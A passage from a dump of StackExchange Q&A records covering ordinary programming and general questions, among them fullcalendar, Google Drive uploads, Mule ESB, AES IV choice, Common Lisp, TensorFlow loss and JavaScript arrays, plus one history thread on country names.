figure. I think that `NDSolve` is interpolating between steps to get `x[t]` at the events, but it appears that it has botched the interpolation formula (a somewhat wild guess).\n","meta":{"source":"mathematica.stackexchange","title":"Force WhenEvent to respect default stepsize","dup_signals":{}},"subset":"stackexchange"} +{"text":"fullcalendar scheduler sources\n\nQuestion: I am supposed to see 2 columns,'Room A' and 'Room B'. However, I can see only one column without either. please let me know what I missed. \nThank you in advance\n<code><script>\n $(function() {\n\n \/\/ page is now ready, initialize the calendar...\n\n $('#calendar').fullCalendar({\n schedulerLicenseKey: 'CC-Attribution-NonCommercial-NoDerivatives',\n \/\/ put your options and callbacks here\n defaultView: 'agendaDay',\n events: [\n \/\/ events go here\n ],\n Resources: [\n { id: 'a', title: 'Room A' },\n { id: 'b', title: 'Room B', eventColor:'green'}\n ]\n })\n });\n<\/script>\n<\/code>\nAnswer: Your Resources is capitalized. You need to change it to lower case \n<code> resources: [\n { id: 'a', title: 'Room A' },\n { id: 'b', title: 'Room B', eventColor:'green'}\n ]\n<\/code>\n","meta":{"source":"stackoverflow","title":"fullcalendar scheduler sources","dup_signals":{}},"subset":"stackexchange"} +{"text":"Unable to upload file in specific folder in google drive using REST API\n\nQuestion: I am trying to upload a local file to a specified folder in Google Drive using REST API from android app, the file is uploading in the root directory but not uploading in the specified folder. No error in the API.\nUsing the following API:\nhttps:\/\/developers.google.com\/drive\/api\/guides\/manage-uploads#multipart\nTried passing the folder ID in metadata in following ways:\n1.\n<code>String[] arr = {parentFolderId}; \njsonObject.put(\"parents\", arr);\njsonObject.put(\"name\", file.getName());\n<\/code>\n\n<code>JSONArray jsonArray = new JSONArray();\nJSONObject jsonObject1 = new JSONObject();\njsonObject1.put(\"id\", parentFolderId);\njsonArray.put(jsonObject1);\njsonObject.put(\"parents\", jsonArray);\njsonObject.put(\"name\", file.getName());\n<\/code>\n\n<code>ArrayList<String> arrayList = new ArrayList<>(); \narrayList.add(parentFolderId);\njsonObject.put(\"parents\", arrayList);\njsonObject.put(\"name\", file.getName());\n<\/code>\n\"parents\" parameter isn't working, also tried using \"addParents\" parameter.\nKindly suggest a way to specify the parent folder ID.\nComment: In the future you should include the error message you are getting from these calls.\nComment: There is no error message in the API response\nComment: If there is no error message how do you know its not working?\nComment: The file is uploading in root directory and not the specified folder.\nComment: parse your object to json lets see what it looks like.\nAnswer: I am not a java or android expert but this may get you started.\n<code>String folderId = \"folderID\";\nFile fileMetadata = new File();\nfileMetadata.setName(\"FileName\");\nfileMetadata.setParents(Collections.singletonList(folderId));\n\nFile file = driveService.files().create(fileMetadata)\n.setFields(\"id, parent\")\n.execute();\nSystem.out.println(\"File ID: \" + file.getId());\n<\/code>\nor maybe this\n<code>String UploadFileToGoogleDrive(String sFullPath, String sFileName, String sParentFolderId) { \n com.google.api.services.drive.model.File fileMetadata = new com.google.api.services.drive.model.File();\n fileMetadata.setName(sFileName);\n fileMetadata.setParents(Collections.singletonList(sParentFolderId));\n java.io.File filePath = new java.io.File(sFullPath);\n FileContent mediaContent = new FileContent(null, filePath);\n try {\n com.google.api.services.drive.model.File file = googleDriveService.files().create(fileMetadata, mediaContent)\n .setFields(\"id, parents\")\n .execute();\n return file.getId();\n } catch (IOException e) { \n return null;\n } \n}\n<\/code>\npure rest html\nIm not exactly usre what you mean by \"I am using REST API.\" but if you are trying to do this completely yourself make sure that you build the body properly that is where the metadata is submited.\n<code>POST https:\/\/www.googleapis.com\/drive\/v3\/files?key=[YOUR_API_KEY] HTTP\/1.1\n\nAuthorization: Bearer [YOUR_ACCESS_TOKEN]\nAccept: application\/json\nContent-Type: application\/json\n\n{\n \"name\": \"test\",\n \"parents\": [\n \"folderId\"\n ]\n}\n<\/code>\nComment: I have used \"parents\" parameter but its not working. I am not using SDK, I am using REST API.\nComment: i would print out your body. Sounds like the formatting isnt right if your not using the SDK. I put in an edit of what the body is supposed to look like in raw json.\nComment: \"parents\": [\n \"folderId\"\n ]\n\nI tried this but isn't working\nComment: Define \"isnt working\"\nComment: The file is uploading in root directory and not the specified folder.\nComment: What about the name of the file is that right?\nComment: Let us [continue this discussion in chat](https:\/\/chat.stackoverflow.com\/rooms\/246228\/discussion-between-mahesh-ambekar-and-daimto).\n","meta":{"source":"stackoverflow","title":"Unable to upload file in specific folder in google drive using REST API","dup_signals":{}},"subset":"stackexchange"} +{"text":"Mule ESB Flow calling SOAP not working but worked from SOAP UI\n\nQuestion: Details : I have created on flow in MuleESB which is calling a web-service without any parameter just sending it username, password and token in a property and it is working fine.\nBut the second API I want to post some parameters while calling soap request but I don't know how to use it I tried to pass through set payload but no response.\n<code><http:listener-config name=\"HTTP_Listener_Configuration\" host=\"0.0.0.0\" port=\"8081\" doc:name=\"HTTP Listener Configuration\"\/>\n<http:request-config name=\"HTTP_Request_Configuration\" host=\"webservicehostadd\" port=\"443\" doc:name=\"HTTP Request Configuration\">\n <http:basic-authentication username=\"username\" password=\"pass\"\/>\n <\/http:request-config>\n <ws:consumer-config name=\"Web_Service_Consumer\" wsdlLocation=\"https:\/\/xxxx\/1.0?wsdl\" service=\"xxx\" port=\"xxxx\" serviceAddress=\"https:\/\/xxxxx\/1.0\" connectorConfig=\"HTTP_Request_Configuration\" doc:name=\"Web Service Consumer\"\/>\n <flow name=\"mycustomflow\">\n <http:listener config-ref=\"HTTP_Listener_Configuration\" path=\"\/TEST\" doc:name=\"HTTP\"\/>\n <set-property propertyName=\"APIKey\" value=\"xxx-xxx-xxx-xxx-xxx\" doc:name=\"Property\"\/>\n <dw:transform-message doc:name=\"Transform Message\" metadata:id=\"xxx-xxx-xxx-xxx-xxxxxxxx\">\n <dw:input-payload mimeType=\"application\/xml\"\/>\n <dw:set-payload><![CDATA[%dw 1.0\n%output application\/xml\n%namespace ns0 http:\/\/localhost\/getDetails:getDetailsWSD\n---\n{\n ns0#getDetails: {\n getDetailsOrder: {\n ID: payload.ns0#getDetails.getDetailsOrder.ID,\n AllData: payload.ns0#getDetails.getDetailsOrder.AllData\n }\n }\n}]]><\/dw:set-payload>\n <\/dw:transform-message>\n <ws:consumer config-ref=\"Web_Service_Consumer\" operation=\"employeeDetails\" doc:name=\"Web Service Consumer\"\/>\n <\/flow>\n\nIt showed the below error:\n\nException while executing: \n[row,col]: [1,1]\nUnexpected character '{' (code 123) in prolog; expected '<'\n at [row,col {unknown-source}]: [1,1].\n<\/code>\nAnswer: Updated answer:\n<code><dw:transform-message metadata:id=\"XXXXX\" doc:name=\"Transform Message\">\n<dw:set-payload><![CDATA[\n %output application\/xml skipNullOn=\"everywhere\" \n %namespace ns0 localhost\/getDetails:getDetailsWSD \n ---\n {\n ns0#getDetails: { \n getDetailsOrder: { \n ID: payload.ns0#getDetails.getDetailsOrder.ID, \n AllData: payload.ns0#getDetails.getDetailsOrder.AllData \n } \n } \n }]]>\n<\/dw:set-payload>\n<\/dw:transform-message>\n<\/code>\nIn your scenario: you are passing a body in XML format and sometimes an empty body in your Postman requests. \nPassing an empty body results your payload to be <code>{NullPayload}<\/code>. To handle this, we have to remove explicitly defining the input mime type: <code><dw:input-payload mimeType=\"application\/xml\"\/><\/code>.\nIn your transformation: <code>ID: payload.ns0#getDetails.getDetailsOrder.ID,<\/code>. You are retrieving a value from an empty payload and this will fail. To avoid failing, we have added: <code>skipNullOn=\"everywhere\"<\/code>. You can read more about it here.\nI have tried the transformation myself which results to this:\n<code><?xml version='1.0' encoding='UTF-8'?>\n<ns0:getDetails xmlns:ns0=\"http:\/\/localhost\/getDetails:getDetailsWSD\">\n <getDetailsOrder\/>\n<\/ns0:getDetails>\n<\/code>\nI think we are done with your initial issue regarding transformation of your empty payload. Your concern now is consuming the web service.\nThank you.\nComment: I tried but it showed the below error:\nAnd i am using POSTMAN to try this api and sending the input as params.\n\nException while executing: {NullPayload} ^ Unexpected character 'N' at payload@[1:2] (line:column), expected '\"'.\nComment: Can you provide a screenshot of your Postman request? Is the body of your request empty?\nComment: yes sometimes it is empty some times error as stated above.\nComment: I see. So the parameters are optional?\nComment: Yes they are. but if they are null means no values then it is showing the result on SOAP UI as \"please enter parameters\"\nComment: Its very urgent to me kindly help me to solve this one!\nComment: Kindly provide the body of the request if it is not empty.\nComment: If \n\nThen body is\n Exception while executing: \n [row,col]: [1,1]\n Unexpected character '{' (code 123) in prolog; expected '<'\n at [row,col {unknown-source}]: [1,1].\n\nIf \n\n Exception while executing: \n {NullPayload}\n ^\n Unexpected character 'N' at payload@[1:2] (line:column), expected '\"'.\nComment: Try this:\n\n \n%output application\/xml skipNullOn=\"everywhere\"\n%namespace ns0 http:\/\/localhost\/getDetails:getDetailsWSD\n---\n{\n ns0#getDetails: {\n getDetailsOrder: {\n ID: payload.ns0#getDetails.getDetailsOrder.ID,\n AllData: payload.ns0#getDetails.getDetailsOrder.AllData\n }\n }\n}\nComment: Its showing blank result and in mule it is showing below log:\n\nINFO [[checkgsbmock].HTTP_Listener_Configuration.worker.01] com.mulesoft.weave.mule.utils.MuleWeaveFactory$: MimeType was not resolved '*\/*' delegating to Java.\nComment: @Mahesh_Loya Now i have a SOAP web service with ws security username password while in SOAP UI i am calling this service and adding the outgoing ws-security configuration username password add nonce and add created and applying this WS in sending the request. Response is showing but how to do from Mule CXF. \nWell i know that mule web service consumer has this option but unfortunately i don't know that bu using thew ws consumer but flow doesn't deployed it shows failed and in console shows some WSDLUtils.java error.\n","meta":{"source":"stackoverflow","title":"Mule ESB Flow calling SOAP not working but worked from SOAP UI","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why some countries have more than one name?\n\nQuestion: I know Persian Language, In persian (Farsi) that is an old language we call Netherlands \"Holland\" , call Germany \"Alman\", Call Poland \"Lahestan\", call India \"Hend\" and etc.\nWhat is the reason and Why these countries have more than one name?\nComment: There is no single reason. Instead, different countries have acquired different names due to a range of different reasons. For example, the Netherlands is called Holland, because [Holland](http:\/\/en.wikipedia.org\/wiki\/Holland) is its most famous and important province. Germany is called Almain after the [Germanic Alemanni tribe](http:\/\/en.wikipedia.org\/wiki\/Alemanni). I suggest focusing on the names of a single country to make this question less overwhelmingly broad.\nComment: Did you do any research before posting? [Possible overlap](http:\/\/history.stackexchange.com\/q\/8590\/1401) Not strictly a duplicate, but related. [Overlap2](http:\/\/history.stackexchange.com\/q\/14468\/1401)\nComment: in case of the Netherlands, it's stupid ignorance (including sadly on the part of a lot of Dutch people).\nComment: The question might not be \"too broad,\" now that I have narrowed the focus to \"these\" countries.\nAnswer: I will answer the part of your question about these four specific names. The Persian names for Holland and Germany are recent borrowings from French. Lehest\u0101n is borrowed from Turkish and derives from the name of the Lendians, a Slavic tribe who once lived in what is now Poland. Hend is an Arabicised form of Middle Persian hind\u016bg, Old Persian hind\u016b-, Sanskrit sindhu-, the ancient name of the province now known as Sindh.\nAnswer: There are many Geo political reasons for that. Most of the other names are kept by other countries. India is called India (from Indus) because British kept it. Its called Hindustan (Land of Hindus) because Arabs kept it. Germans call their country Deutschland but internationally it is called as Germany. It is the same as we have synonyms in any language for a word. If you consider Japan, they call it Nippon meaning Land of rising sun. So these different meanings give a country multiple names.\nAnswer: Historically, every country had many different names - what they called themselves, and what others called them. Conquerors came and said \"This is now SomethingLand\" while the people who lived there were already calling it \"OurIsland\" in their language or \"LandOfTrees\" in their language or whatever. [There is a claim that \"Canada\" comes from an Iroquoian word for \"the village\" because someone asked a guide \"what do you call all of this place?\" - it might not be true though.] Some folks called their neighbours Outsiders and their homes Outside, while those outsiders called themselves something different.\nThese days we're usually polite and call countries what they want to be called. But even that can be complicated. There is the province thing (this gives you not only Holland for the Netherlands, but England for the UK) but there is also the matter of abbreviations. Do you say the US or the USA or America? \nIn the end, there are a number of different words for \"the Netherlands\" in 10 different languages for exactly the same reason there are a number of different words for \"cat\" or \"contract.\" They are different languages.\nAnswer: Some countries have a \"second\" name that is derived from its most famous state or province. For instance, \"Holland\" is the most famous province of the Netherlands, Farsi (Persia) of Iran, etc. \"Schweiz\" or \"Switzerland\" is the most famous state of a country whose official name is the \"Confederation of Helvetia.\"\n\"Germany,\" in its English form, was named after a group of \"Germans,\" as was Aleman (Alemani). But the country's \"real\" name, in its native language, is \"Deutschland.\"\nComment: The English designation of the people of the Netherlands as \"Dutch\" is an old, but established error.\nComment: ...which confuses a lot of us English speakers because we call people who live in the Netherlands \"Dutch\", so logically if we were to call anywhere \"Dutch-land\" it would be Holland, not Germany.\nAnswer: A lot of variation in country names is based on translations. For instance, \"Netherlands\" means \"Low Countries\" and is called, in French, \"Pays-Bas\" which has the same meaning, but looks significantly different. It shall be noted that the United Nations has six official languages into which most UN documents are translated; therefore, though each UN member decides on its own name, it has to provide (at least) six variants for these six languages. Since these languages use widely different signs, one of them (Chinese) being non-alphabetic, a country cannot, logically, have a single official name valid worldwide.\nBeyond translations, it so happens that countries may change names, and the new name is not necessarily adopted immediately and worldwide. For instance, in 1989, Burma changed its name to \"Republic of the Union of Myanmar\", shortened to \"Myanmar\", but many countries refused to recognize the legitimacy of the government of Burma (a military dictatorship), hence its ability to change the formal name of the country. As a UN member, the official English version of the country name is still \"Myanmar\", but \"Burma\" remains in wide usage in some other countries. For instance, this official document from the Australian government can be seen to use both \"Burma\" and \"Myanmar\" as country name, sometimes switching within the same paragraph with no explanation.\nCountry names have a huge symbolic value and can lead to interferences with and from other countries. Case in point: Macedonia (in the UN, Macedonia is known as \"the former Yugoslav Republic of Macedonia\", a name which is officially \"provisional\" and has been so for more than two decades).\n","meta":{"source":"history.stackexchange","title":"Why some countries have more than one name?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Optimal delivery method for a large quantity of images\n\nQuestion: I have a website centered around an online chat application where each user can have up to several hundred contacts. Each contact has there own profile image. I want to make it so that the contact's profile image is loaded next to there name. However, having the user download 100+ images every time they load the site seems intensive (Studies have shown that as much as 40% of users don't utilize there cache). Each image is around 60x60 pixels in dimension. \nWhen I search on google or sign on to facebook, dozens of images are served nearly instantaneously. Beyond just having fast servers and a good connection, what are the optimal methods for delivering so many images to the user?\nPossible approaches I have come up with are:\n\nStoring each user's profile image in a database, constructing one image in a php file, than having the user download that, then using css to display each profile image. However, this seems extremely intense on the server and referencing such a large file so many times might take a toll on the user's browser.\nUsing nginx rather than apache to server the images (nginx generally works better to server static content such as this). However, this seems more like an optimization to a solution, rather than a solution in itself.\n\nI am also aware that data can be delivered across persistent http connections so multiple requests do not have to be made to the server for multiple files. However, exactly how many files can be delivered across one persistent connection. Would this persistent model mean that just having the images load as separate files would not necessarily be a bad idea?\nAny suggestions, solutions, and\/or notes on personal experiences with relevant matters would be greatly appreciated. Scalability is extremely important here, as well as cross-browser support (IE7+, Opera, Firefox, Chrome, Safari)\nEDIT: I AM NOT USING JQUERY.\nComment: Maybe you've already looked into stuff like this, but a common way to solve the \"too much data returned at once\" issue is pagination. Simply don't return all their contacts at once. For an example, look at how myspace and facebook list your friends. They're not all served up at once, and they have various sorting and searching features, because the user is really just looking at their contacts to find one, or a few people, or browse them slowly. The usage pattern doesn't really show a need to display all of them all the time.\nComment: That makes sense. However, on my page the contacts list is displayed with all the contacts at once for enhanced functionality. I can make it so the image only shows up when the chat screen is opened, but am curious if having them all load at once is a possibility.\nComment: I think you would have to learn how the caching mechanism work on browsers to get all of those images to the users browser and keep it there. The problem with caching is mostly on the web site side sending cookies then the users browser.\nComment: I recently came across this blog post that may be helpful: http:\/\/blog.teachstreet.com\/homepage\/how-to-use-amazon-s3-scaling-image-hosting\/\nComment: Thank you for the informative blog post. Using an external host such as S3 might be a good option here. My site without the images has a very, very small file usage to user ratio. Being able to scale the images portion of the hosting separate from everything else would make things easier.\nAnswer: Here's a jquery plugin that delays loading images until they're actually needed (i.e., only loads images \"above the fold\".)\nhttp:\/\/www.appelsiini.net\/2007\/9\/lazy-load-images-jquery-plugin\nAn alternative may be to use Flash to display just the images. The advantage is Flash is a much stronger local cache that you have programm\nComment: I am not using jQuery. Flash definitely would be nice but it is something I want to avoid for greater compatibility.\n","meta":{"source":"stackoverflow","title":"Optimal delivery method for a large quantity of images","dup_signals":{}},"subset":"stackexchange"} +{"text":"slow loading when clicked on table view cell\n\nQuestion: When i click on table view cell, it will be in the same table view for some time(till the next page is completely load) then it will display the next view..\ni want on click on the table view cell, it should immediately goto next page and show the loading page popup..\ni have tried with impActivityAgent and also tried to show alert view when it will enter the next page(but view is of previous page ie table view).. but.. its loading the page completely, which will take time and then its showing alert..\nin next page i am posting and parsing the data which will take time, during that time i want to show the activity indicator..\ni have tried many methods, but still its first loading the next page completely and then displaying the contents or alertView or activity indicator and i am not able to show the activity indicator when clicked on table view cell..\nMY CODE:\n<code>- (void)tableView:(UITableView *)tableView didSelectRowAtIndexPath:(NSIndexPath *)indexPath\n{\n nextTableViewController *doc = [[nextTableViewController alloc]initWithNibName:@\"nextTableViewController\" bundle:nil];\n [self.navigationController pushViewController:doc animated:YES];\n}\n<\/code>\nAND NEXT VIEW CONTROLLER IS :\n<code>- (void)viewDidLoad\n{\n[super viewDidLoad];\n\/\/ Do any additional setup after loading the view from its nib.\n[[ImpActivityAgent defaultAgent] makeBusy:YES];\n\nNSURL *loadUrl = [NSURL URLWithString:[NSString stringWithFormat:@\"http:\/\/%@\/gmail.com\",inputURL]];\nhtmlData = [NSData dataWithContentsOfURL:loadUrl];\nself.htmlSTR = [[NSString alloc] initWithData:htmlData encoding:NSUTF8StringEncoding];\n[self parseHTML];\n}\n<\/code>\nand in Parse function i am Parsing the content which i got as response in HTML formate using \"hpple\" Parser..\nComment: Post your code for tableView:didSelectRowAtIndexPath:, and whatever you do in the next controller in viewDidLoad, viewDidAppear, etc.\nComment: Check any back ground process is going on after u selected the row. Post some relevant code.\nComment: no there is no back groung Process going on..\nComment: @Raju, Post your code\nComment: please find the above edited question with code..\nComment: @Raju you are calling webservice in Viewdidload . so when u push your controller then first it will get data from service and after that it will push to next view. so paste your whole code in viewdidappear as per rdelmar's suggesion.\nAnswer: Just use one separate thread to handle parsing. Hope this code will help you. \n<code>- (void)viewDidLoad\n{\n[super viewDidLoad];\n\/\/ Do any additional setup after loading the view from its nib.\n[[ImpActivityAgent defaultAgent] makeBusy:YES];\n\n[NSThread detachNewThreadSelector:@selector(newMethodForParsing) toTarget:self withObject:nil];\n\n}\n\n-(void)newMethodForParsing\n{\nNSURL *loadUrl = [NSURL URLWithString:[NSString stringWithFormat:@\"http:\/\/%@\/gmail.com\",inputURL]];\nhtmlData = [NSData dataWithContentsOfURL:loadUrl];\nself.htmlSTR = [[NSString alloc] initWithData:htmlData encoding:NSUTF8StringEncoding];\n[self parseHTML];\n\n[tableView reload]; \/\/ tableView refers to your table view name\n\n}\n<\/code>\nComment: now im getting what i requires but its not calling \"-(UITableViewCell *)tableView:(UITableView *)tableView cellForRowAtIndexPath:(NSIndexPath *)indexPath\" function.. which is present in nextViewController..\nComment: Check now. Updated my answer. U need to reload the table view once parsing is completed.\nComment: @ Ganapathy : how can i stop os cancel or kill this thread on cancel button? i am using \"[NSThread cancelPreviousPerformRequestsWithTarget:self selector:@selector(newMethodForParsing) object:nil];\" but its now working..\nAnswer: Try this\n<code>-(void)viewDidAppear:(BOOL)animated\n{\n [super viewDidAppear:animated];\n [[ImpActivityAgent defaultAgent] makeBusy:YES];\n [self performSelectorInBackground:@selector(start) withObject:Nil];\n \/\/or you can use after delay then no need to use perform selector on main thread in start method.\n [self performSelector:@selector(start) withObject:nil afterDelay:0.5];\n}\n\n-(void)start\n{\n NSURL *loadUrl = [NSURL URLWithString:[NSString stringWithFormat:@\"http:\/\/%@\/gmail.com\",inputURL]];\n htmlData = [NSData dataWithContentsOfURL:loadUrl];\n self.htmlSTR = [[NSString alloc] initWithData:htmlData encoding:NSUTF8StringEncoding];\n [self performSelectorOnMainThread:@selector(parseHTML) withObject:Nil waitUntilDone:YES];\n}\n<\/code>\nAnswer: Try it....\n<code>- (void)viewDidLoad\n{\n [super viewDidLoad];\n \/\/ Do any additional setup after loading the view from its nib.\n [NSTimer scheduledTimerWithTimeInterval:1 target:self selector:@selector(newMethodForParsing) userInfo:nil repeats:NO];\n}\n\n-(void)newMethodForParsing\n{\nNSURL *loadUrl = [NSURL URLWithString:[NSString stringWithFormat:@\"http:\/\/%@\/gmail.com\",inputURL]];\nhtmlData = [NSData dataWithContentsOfURL:loadUrl];\nself.htmlSTR = [[NSString alloc] initWithData:htmlData encoding:NSUTF8StringEncoding];\n[self parseHTML];\n}\n<\/code>\nAnswer: Ganapathy's answer leaks memory, you need to place an autoreleasepool inside the method. this is a simpler way to do this. this will run on the main thread but after the existing tasks in the queue.\nIf you want it to run on a different thread replace with <code>dispatch_get_global_queue()<\/code>\n<code>- (void)viewDidLoad\n{\n [super viewDidLoad];\n \/\/ Do any additional setup after loading the view from its nib.\n [[ImpActivityAgent defaultAgent] makeBusy:YES];\n\n dispatch_async(dispatch_get_main_queue(), ^{\n\n NSURL *loadUrl = [NSURL URLWithString:[NSString stringWithFormat:@\"http:\/\/%@\/gmail.com\",inputURL]];\n htmlData = [NSData dataWithContentsOfURL:loadUrl];\n self.htmlSTR = [[NSString alloc] initWithData:htmlData encoding:NSUTF8StringEncoding];\n [self parseHTML];\n )\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"slow loading when clicked on table view cell","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it safe to use file's hash as IV?\n\nQuestion: I'm encrypting some files using AES in CBC mode. \nI'm also using file's digest (SHA-1) to check that data is decrypted correctly (so I need to store it with file).\nIs it safe to use this digest as AES's IV and store it in the header of file? Or it has security issue? \nAnswer: By using the file's hash as IV, you also divulge the file's hash. This allows an attacker to make an exhaustive search on the file contents. It is not difficult to imagine situations where there are only a few millions or billions of possible file contents (e.g. the file contents are an encrypted SAN or password), in which case showing the data hash is an intolerable leak.\nWhat you could use as IV is the result of HMAC over the file, using as key the same key than for encryption (or, preferably, derive both the HMAC key and the encryption key with a suitable PRF). The result would probably be quite hard to prove secure in any way, so don't do it for production; but it seems like a promising way to achieve context-free deterministic encryption.\n\"Context-free\" means \"without any memory\". Some encryption modes require a random, unpredictable IV, while others just need nonces (e.g. a counter); you can obtain the former from the latter by encrypting the nonces with a block cipher, using a specific secret key for that. A counter still requires a bit of memory, which, depending on the situation, may or may not be easy to obtain. Some embedded systems would have difficulty updating a stored counter (permanent storage update draws a bit of current, a scarce resource on passive RFID systems). Since embedded systems rarely own a reliable source of randomness, they need deterministic encryption. Context-free deterministic encryption is thus an important niche functionality. Using HMAC to compute the IV for encryption may be a way to achieve that (with the important drawback of requiring a first pass on the whole file, before obtaining the IV which is need to begin encrypting it).\nComment: As a side note, if you store the HMAC-derived IV and use it as an authentication token, you do in fact have a provably secure deterministic authentaction scheme (DAE): SIV. (See the DAE paper by Rogaway and Shrimpton.) Of course, barring restrictions like the ones Thomas mentions, a standard (non-deterministic) AE scheme would be better.\nComment: What do you mean by \"seems like a promising way\"? What would be the current best practice for context-free deterministic encryption?\nAnswer: You obviously lose semantic security when you use deterministic encryption. This means an attacker can tell if two files are identical. publishing the unencrypted hash also leaks which file you encrypted, if the attacker knows the hash from elsewhere.\nYou end up with something similar to convergent encryption, which has a few issues. Check the question Is Convergent Encryption really secure? for details. I recommend using this scheme only if you want the properties of convergent encryption. Use a random IV otherwise.\nI also recommend using standard MACs instead of a homebrew SHA-1 construction. When using CBC it's essential to first verify the MAC, and only then attempt to decrypt the message. Else you'll probably vulnerable to padding-oracle attacks.\nThe easiest solution is using authenticated encryption such as AES-GCM with a random IV.\nAnswer: It depends on the mode of operation. With counter mode, predictable IV's are fine. Of course, a collision in file hashes would result in easy plain-text recovery. \nIt's probably better to fill the high order 64-bits with the number of microseconds since the unix epoc, pad the rest of the 64-bits with random numbers and the use the low order 64-bits as the counter. It'd be pretty hard for IVs to collide in that set-up if encrypting stuff on a local PC.\nWith CBC they really need to be randomly selected. Predictable CBC IVs can lead to attacks, as BEAST demonstrated.\nComment: A predictable IV for CBC-mode is mainly a problem when the attacker can do a chosen plaintext attack (adapt the plaintext to the IV). In this case the IV depends on the (full) plaintext, so a chosen plaintext attacker has to try a while to get \"good\" ciphertext-IV combinations. (But I suppose a chosen plaintext attack is not really a problem for a file encryption scheme.)\nComment: I'm using CBC but how file's hash is predictable? the attacker doesn't have original file to generate hash!\nAnswer: MS SQL server's \"Always Encrypted\" functionality uses AES-256 CBC, and they derive the IV from a HMAC-SHA256 of some content that includes the database cell to be encrypted as well as the encryption key (as well as some fixed values).\nMS Doc - Data Encryption Algorithm\n<code>When using deterministic encryption: IV = HMAC-SHA-256( iv_key, cell_data ) truncated to 128 bits\niv_key = HMAC-SHA-256(CEK, \"Microsoft SQL Server cell IV key\" + algorithm + CEK_length)\n<\/code>\nSo there is at least some one widely deployed crytosystem taking this approach.\n","meta":{"source":"crypto.stackexchange","title":"Is it safe to use file's hash as IV?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Typed lambda functions in Common Lisp\n\nQuestion: I don't know of any practical uses for this, it just came to my mind whether there is any thing comparable to <code>defmethod<\/code> to <code>defun<\/code> for <code>lambda<\/code>? Something like this\n<code>(defmacro tlambda (args &body body)\n (let* ((gf-name (subseq (write-to-string (gensym)) 2))\n (gf-sym (read-from-string gf-name)))\n `(progn (defmethod ,gf-sym ,args ,@body)\n (prog1 (symbol-function ',gf-sym) (unintern ',gf-sym)))))\n\n(tlambda ((x fixnum))) ;#<STANDARD-GENERIC-FUNCTION #:G759 (1)>\n(funcall (tlambda ((x fixnum)) (* x 2)) 4) ;8\n(funcall (tlambda ((x list)) (second x)) '(a s d f)) ;S\n(funcall (tlambda ((x string)) (string-upcase x)) \"lambda\") ;\"LAMBDA\"\n<\/code>\nAnswer: I do not think that this makes sense in the shape you show. What should happen if the type doesn't match? If you just want to check types, use <code>check-type<\/code>.\n<code>Defmethod<\/code> and <code>defun<\/code> are not really comparable, by the way. <code>Defun<\/code> registers a function, while <code>defmethod<\/code> adds a method to an existing (though maybe implicitly created) generic function. The types that you use in a method definition are used to dispatch (runtime polymorphism) to the right method upon invocation of the generic function. The mechanisms for this dispatch are a bit expensive when constructed, so you probably shouldn't try to do that on the fly (something like a <code>generic-lambda<\/code>) or transiently (something like a <code>method-let<\/code>).\nInstead, use (<code>e<\/code>\/<code>c<\/code>)<code>typecase<\/code> and similar for ad hoc dispatch, and <code>check-type<\/code> for checking types. There are also libraries for pattern-based polymorphism (e. g. optima, trivia), which you could use for more elaborate cases.\nAnswer: I agree with Svante that you probably don't want this. But if you did want it the way you are doing it is very confused: I simply don't understand what you are doing with <code>gf-sym<\/code> and <code>gf-name<\/code> but it represents some quite serious confusion about symbols I think (and is almost certainly unsafe). Instead you could do something like this:\n<code>(defmacro tlambda (&body cases)\n (let* ((gf-name (gensym)))\n `(progn\n ,@(mapcar (lambda (case)\n `(defmethod ,gf-name ,@case))\n cases)\n (symbol-function ',gf-name))))\n<\/code>\nAnd now\n<code>> (let ((l (tlambda\n ((x y) (cons x y))\n ((x (y integer))\n (declare (ignore x)) y))))\n (values (funcall l 'a 'b)\n (funcall l 'a 1)))\n(a . b)\n1\n<\/code>\nI'm not sure whether the objects created by <code>tlambda<\/code> can be garbage-collected: it may be they can.\n","meta":{"source":"stackoverflow","title":"Typed lambda functions in Common Lisp","dup_signals":{}},"subset":"stackexchange"} +{"text":"High Loss despite correct Weight and bias -Tensorflow\n\nQuestion: I am a begginer user of tensorflow and am making a program to explain linear regression. I have one input which is the year the house was bought (my program is a house price identifier) and the weight and bias were identical to excel's trendline linear equation. Unfortunately the cost ended at 70.\n<code>import tensorflow as tf\nimport os\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nfilename = dir_path+ \"\\ActualHousePriceData7.csv\"\n\nlearn_rate=0.001\n\nw=tf.Variable(([1.00]),tf.float32)\nb=tf.Variable(([1.00]),tf.float32)\nx= tf.placeholder(tf.float32)\ny_=tf.placeholder(tf.float32)\n\ninit= tf.global_variables_initializer()\nsess=tf.Session()\nsess.run(init)\n\nall_x1s = []\nall_ys = []\n\nwith tf.Session() as sess:\n sess.run( tf.global_variables_initializer())\n with open(filename) as inf:\n # Skip header\n next(inf)\n for line in inf:\n # Read data, using python, into our features\n housenumber, _x1, _y_= line.strip().split(\",\")\n all_x1s.append(float(_x1))\n all_ys.append(float(_y_))\n\nsess = tf.Session()\nsess.run(init)\ny_pred = (x*w)+ b\nsquared_deltas = tf.square(y_ - y_pred)\ncost = tf.reduce_sum(squared_deltas)\ntrain_step = tf.train.GradientDescentOptimizer(learn_rate).minimize(cost)\n\nprint (all_x1s)\nfor i in range(10000):\n sess.run(train_step, feed_dict={x:all_x1s ,y_:all_ys})\n print(\"After %d iteration:\" % i)\n print(\"W: %f\" % sess.run(w))\n print(\"b: %f\" % sess.run(b))\n print(\"Cost\")\n print(sess.run(cost,feed_dict={x:all_x1s, y_:all_ys}))\n<\/code>\nIs there a problem with how I am outputting the cost or is it something else? Any help would be amazing!\nAnswer: Since you are using <code>squared_loss<\/code>, its recommended to use mean of the loss not sum. \n<code>cost = tf.reduce_mean(squared_deltas)\n<\/code>\n","meta":{"source":"stackoverflow","title":"High Loss despite correct Weight and bias -Tensorflow","dup_signals":{}},"subset":"stackexchange"} +{"text":"To Make alternating array\n\nQuestion: I am learning the basics and I just cannot hack this one:\nThis function will be called with an array and should return a new array containing only the alternate elements starting from index 0. If the array is empty or contains only 1 item, return the original array.\n<code>makeAlternatingArray(['hey', 'hi']);\n\/\/ should return ['hey']\n\nmakeAlternatingArray(['a', 'b', 'c', 'd', 'e']);\n\/\/ should return ['a', 'c', 'e']\n<\/code>\nWhat I got so far is:\n<code>function makeAlternatingArray(array) {\n if (array.length<=1){\n return array\n }\n for (let i=0; i<array.length; i=+2){\n return array[i]\n }\n \n}\n<\/code>\nTop part is correct but by for let statement is wrong. I am 